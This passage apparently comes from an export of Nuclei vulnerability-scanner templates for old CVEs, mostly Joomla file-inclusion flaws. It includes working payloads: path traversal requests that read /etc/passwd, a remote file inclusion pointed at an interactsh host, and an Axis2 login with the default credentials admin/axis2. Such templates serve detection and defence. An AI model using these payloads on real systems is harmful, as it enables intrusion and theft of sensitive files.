Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/9564\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964\n - https://nvd.nist.gov/vuln/detail/CVE-2009-3053\n - http://www.exploit-db.com/exploits/9564\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2009-3053\n cwe-id: CWE-22\n epss-score: 0.00447\n epss-percentile: 0.74489\n cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\n tags: cve2009,cve,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b1484271cee40bf0b4aea6f4d71ca3af8dbc80c595ae0ac214b2c4a50f9e208d02206d398d3a43e76b1fe42dd939684c2051143435d1f0dabe2491f7e7e9cf780c28:922c64590222798bb761d5b6d8e72950", "hash": "157932a5667bdc79a6191553d2e5ace7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5e" }, "name": "CVE-2009-3318.yaml", "content": "id: CVE-2009-3318\n\ninfo:\n name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion\n author: daffainfo\n severity: high\n description: Joomla! 
Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.\n impact: |\n The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, data disclosure.\n remediation: |\n Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates.\n reference:\n - https://www.exploit-db.com/exploits/9706\n - https://nvd.nist.gov/vuln/detail/CVE-2009-3318\n - http://www.exploit-db.com/exploits/9706\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-3318\n cwe-id: CWE-22\n epss-score: 0.00706\n epss-percentile: 0.79951\n cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\n tags: cve2009,cve,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bc8b6fb22e490512109118ecf32279b8742eb0391a184c91700c91da8b4591eb022100c82312184befa6261e4804c856191e828d49e06fd6f09184837202906a4f1d4e:922c64590222798bb761d5b6d8e72950", "hash": "25a7c92e23e6cba700ff3f49cc6eee0f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5f" }, "name": "CVE-2009-4202.yaml", "content": "id: CVE-2009-4202\n\ninfo:\n name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion\n author: daffainfo\n severity: high\n description: Joomla! 
Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: |\n Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/8870\n - http://www.vupen.com/english/advisories/2009/1494\n - https://nvd.nist.gov/vuln/detail/CVE-2009-4202\n - http://www.exploit-db.com/exploits/8870\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-4202\n cwe-id: CWE-22\n epss-score: 0.01956\n epss-percentile: 0.87449\n cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\\!\n tags: cve,cve2009,joomla,lfi,photo,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202c777774f99408aa53f9024ed173c4b5f653295367409e9b42c256336d3a3ad4022100ea93147fd00a0eba5c9c1ff6e8a48bba81f4df36c20ecf450a8a67a0b887c5cf:922c64590222798bb761d5b6d8e72950", "hash": "6732827e15dba0011e997f92d524b5c4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e60" }, "name": "CVE-2009-4223.yaml", "content": "id: CVE-2009-4223\n\ninfo:\n name: KR-Web <=1.1b2 - Remote File Inclusion\n author: geeknik\n severity: high\n description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT 
parameter.\n impact: |\n An attacker can exploit this vulnerability to include arbitrary files from remote servers, leading to remote code execution or information disclosure.\n remediation: |\n Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability.\n reference:\n - https://sourceforge.net/projects/krw/\n - https://www.exploit-db.com/exploits/10216\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/54395\n - http://www.exploit-db.com/exploits/10216\n - https://nvd.nist.gov/vuln/detail/CVE-2009-4223\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-4223\n cwe-id: CWE-94\n epss-score: 0.00611\n epss-percentile: 0.764\n cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gianni_tommasi\n product: kr-php_web_content_server\n tags: cve,cve2009,krweb,rfi,edb,gianni_tommasi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b7331565010d84c002b7cf2f7a86ffaad9ed7987a6af7ed386d0c1fdfc4a2870022100ad93d7312e808e09e1bafe8a62c52b228ef426c7d5a7dcce76a2d12acb50c0fa:922c64590222798bb761d5b6d8e72950", "hash": "da2b62ad70a972b740b85fedc10fea49", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e61" }, "name": "CVE-2009-4679.yaml", "content": "id: CVE-2009-4679\n\ninfo:\n name: Joomla! Portfolio Nexus - Remote File Inclusion\n author: daffainfo\n severity: high\n description: |\n Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/33440\n - https://nvd.nist.gov/vuln/detail/CVE-2009-4679\n - http://www.exploit-db.com/exploits/10754\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-4679\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: inertialfate\n product: com_if_nexus\n tags: cve2009,cve,joomla,lfi,nexus,edb,inertialfate\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022009e6d9fc063d9f363f1aa17a21509658c7830c53762598097f52e1f597f91c33022064ff511367ec547436041cce6d239bfe563e64bb05e8d8c7743fd1edb3d777db:922c64590222798bb761d5b6d8e72950", "hash": "3b534a70eb9b833951944745fc356fab", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e62" }, "name": "CVE-2009-5020.yaml", "content": "id: CVE-2009-5020\n\ninfo:\n name: AWStats < 6.95 - Open Redirect\n author: pdteam\n severity: medium\n description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n impact: |\n Allows attackers to redirect users to malicious websites or phishing pages.\n remediation: Apply all relevant security patches and product upgrades.\n 
reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2009-5020\n - http://awstats.sourceforge.net/docs/awstats_changelog.txt\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P\n cvss-score: 5.8\n cve-id: CVE-2009-5020\n cwe-id: CWE-20\n epss-score: 0.00215\n epss-percentile: 0.59474\n cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: awstats\n product: awstats\n tags: cve2009,cve,redirect,awstats\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'\n - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a00483046022100e3ee0cfc04525ca64e6f63073fa38f5db6ee44776907c68d8f5e190a19649a9a022100c21acec79450886ccc34a6c7737411102d641536ee3d33788522fb5fd5cf6f15:922c64590222798bb761d5b6d8e72950", "hash": "b66b35748e838b5552f76e57e3b57504", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e63" }, "name": "CVE-2009-5114.yaml", "content": "id: CVE-2009-5114\n\ninfo:\n name: WebGlimpse 2.18.7 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. 
(dot dot) in the DOC parameter.\n impact: |\n An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/36994\n - https://nvd.nist.gov/vuln/detail/CVE-2009-5114\n - http://websecurity.com.ua/2628/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2009-5114\n cwe-id: CWE-22\n epss-score: 0.01329\n epss-percentile: 0.85735\n cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: iwork\n product: webglimpse\n tags: cve,cve2009,edb,lfi,iwork\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205f1bc3fae0095bf323e677c3c93b6cdb42d839f3084ee12f9fe92a0dab609269022100b70a69e966f2e410ba5d8ed821edf339feb20ee4149b37bd66992153e4a341ee:922c64590222798bb761d5b6d8e72950", "hash": "be50ae120dc016b4f0f018b6dfd05cb6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e64" }, "name": "CVE-2010-0157.yaml", "content": "id: CVE-2010-0157\n\ninfo:\n name: Joomla! Component com_biblestudy - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. 
(dot dot) in the controller parameter in a studieslist action to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/10943\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0157\n - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-0157\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80104\n cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\\!\n tags: cve2010,cve,joomla,lfi,edb,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201cc2638735aba64e480061e91a176acb1c5f885f26e50501697f8b444a66148b022075cccef4a1b6548b587c832158f624aa4192a98032f60e9f65fa9f9ec519b465:922c64590222798bb761d5b6d8e72950", "hash": "1d45afd156993453990adb865766a13e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e65" }, "name": "CVE-2010-0219.yaml", "content": "id: CVE-2010-0219\n\ninfo:\n name: Apache Axis2 Default Login\n author: pikpikcu\n severity: critical\n description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.\n impact: |\n Successful exploitation of this vulnerability can lead 
to unauthorized access to sensitive information or the ability to modify or delete data.\n remediation: |\n Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0219\n - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html\n - http://www.rapid7.com/security-center/advisories/R7-0037.jsp\n - http://www.vupen.com/english/advisories/2010/2673\n - http://retrogod.altervista.org/9sg_ca_d2d.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2010-0219\n cwe-id: CWE-255\n epss-score: 0.97509\n epss-percentile: 0.99981\n cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: axis2\n shodan-query: http.html:\"Apache Axis\"\n tags: cve,cve2010,axis,apache,default-login,axis2\n\nhttp:\n - raw:\n - |\n POST /axis2-admin/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n loginUsername={{username}}&loginPassword={{password}}\n - |\n POST /axis2/axis2-admin/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n userName={{username}}&password={{password}}&submit=+Login+\n\n payloads:\n username:\n - admin\n password:\n - axis2\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"

Welcome to Axis2 Web Admin Module !!

\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207ae0781d6298d63fef1e109c6941979f3a9cf2cf97cf52d54fbf5506d103256d02202ab0a38916296abc146346b756d193740490f3a762c1929bf019e92da272776c:922c64590222798bb761d5b6d8e72950", "hash": "2f446a4c2f098302cd95df17a93edf70", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e66" }, "name": "CVE-2010-0467.yaml", "content": "id: CVE-2010-0467\n\ninfo:\n name: Joomla! Component CCNewsLetter - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: Apply all relevant security patches and upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11282\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0467\n - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html\n - http://www.exploit-db.com/exploits/11277\n - http://www.exploit-db.com/exploits/11282\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N\n cvss-score: 5.8\n cve-id: CVE-2010-0467\n cwe-id: CWE-22\n epss-score: 0.06955\n epss-percentile: 0.93792\n cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: chillcreations\n product: com_ccnewsletter\n tags: cve2010,cve,joomla,lfi,edb,chillcreations\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n 
status:\n - 200\n# digest: 490a0046304402202f4ff2ab58c70983fdbde0ee6860d7cb8229e81af51ace5e3e15533082c69a2d022072359ac609c3461da4901b3bb8ccaf83fcf42ccd7e480a74fec618aadba9dcfe:922c64590222798bb761d5b6d8e72950", "hash": "97e8400d19840436bd69a87ca0232e07", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e67" }, "name": "CVE-2010-0696.yaml", "content": "id: CVE-2010-0696\n\ninfo:\n name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.\n impact: |\n An attacker can exploit this vulnerability to retrieve arbitrary files from the server.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11447\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0696\n - http://www.joomlaworks.gr/content/view/77/34/\n - http://www.exploit-db.com/exploits/11447\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-0696\n cwe-id: CWE-22\n epss-score: 0.57303\n epss-percentile: 0.97418\n cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlaworks\n product: jw_allvideos\n tags: cve2010,cve,joomla,lfi,edb,joomlaworks\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
490a00463044022062ed8cccf9ce298ba49005eb279ab8323d07a0560df9ee8857a3d007a3468fd6022025dbbd9a0d7b3ef88719e19a69fbb605dc7e77c1b087598f560b22547b2431d3:922c64590222798bb761d5b6d8e72950", "hash": "d8c0c1c24997976c3a49e32c48052e90", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e68" }, "name": "CVE-2010-0759.yaml", "content": "id: CVE-2010-0759\n\ninfo:\n name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11498\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0759\n - http://www.exploit-db.com/exploits/11498\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/56380\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-0759\n cwe-id: CWE-22\n epss-score: 0.01569\n epss-percentile: 0.86974\n cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: greatjoomla\n product: scriptegrator_plugin\n tags: cve,cve2010,joomla,lfi,plugin,edb,greatjoomla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 
200\n# digest: 4a0a00473045022033efcff5dab3e96c4bd25ffd1f08b5d509129b21c1952b48f4c5f5bce1845b20022100dc3da12554c6710754770645dcafc258f15112fee5ae614da245894df5d37c91:922c64590222798bb761d5b6d8e72950", "hash": "5e63e8a8fd2a135bfa12b9f04cafcf7d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e69" }, "name": "CVE-2010-0942.yaml", "content": "id: CVE-2010-0942\n\ninfo:\n name: Joomla! Component com_jvideodirect - Directory Traversal\n author: daffainfo\n severity: medium\n description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11089\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0942\n - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/55513\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-0942\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jvideodirect\n product: com_jvideodirect\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,jvideodirect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022049a324c195808d1ac76829b45e8f27b6cd31e1527fcbe5131d00a009b78b98b7022100e3e31759811d9e4b4f7781ef77c85f6e426853daf5f1d8eaf52e966c01f8a88e:922c64590222798bb761d5b6d8e72950", "hash": "d8c2a651f0fedecf7a2bfe1681e1df3f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6a" }, "name": "CVE-2010-0943.yaml", "content": "id: CVE-2010-0943\n\ninfo:\n name: Joomla! Component com_jashowcase - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: |\n Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11090\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0943\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/55512\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-0943\n cwe-id: CWE-22\n epss-score: 0.01155\n epss-percentile: 0.83338\n cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlart\n product: com_jashowcase\n tags: cve,cve2010,joomla,lfi,edb,joomlart\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022005106e04d767db02ba9579ef3494c0b2d5753a5b8f86e4ad943211172eb7b81f022100d1852cc2c4587931f40081345b3884b5e96af7f4bd8c0091b8846faed5490f1b:922c64590222798bb761d5b6d8e72950", "hash": "5f72802d4b5ea15f0599dba3a805f2f7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6b" }, "name": "CVE-2010-0944.yaml", "content": "id: CVE-2010-0944\n\ninfo:\n name: Joomla! Component com_jcollection - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11088\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0944\n - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt\n - http://www.exploit-db.com/exploits/11088\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/55514\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-0944\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.75244\n cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thorsten_riess\n product: com_jcollection\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,thorsten_riess\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a0047304502203edf2b86718735a85d6b60ac6465e0d7f9aa063bbfb985ecba7fd8a82500bcc6022100a9017abad716d08a60243fdb71aed727e1b0bc2e44c3d591e200168e9f7bc182:922c64590222798bb761d5b6d8e72950", "hash": "0fa2397d5a70864af65b65170a919818", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e6c" }, "name": "CVE-2010-0972.yaml", "content": "id: CVE-2010-0972\n\ninfo:\n name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://www.exploit-db.com/exploits/11738\n - https://nvd.nist.gov/vuln/detail/CVE-2010-0972\n - http://www.exploit-db.com/exploits/11738\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/56863\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-0972\n cwe-id: CWE-22\n epss-score: 0.00813\n epss-percentile: 0.81406\n cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: g4j.laoneo\n product: com_gcalendar\n tags: cve2010,cve,edb,joomla,lfi,g4j.laoneo\n\nhttp:\n - method: GET\n path:\n - 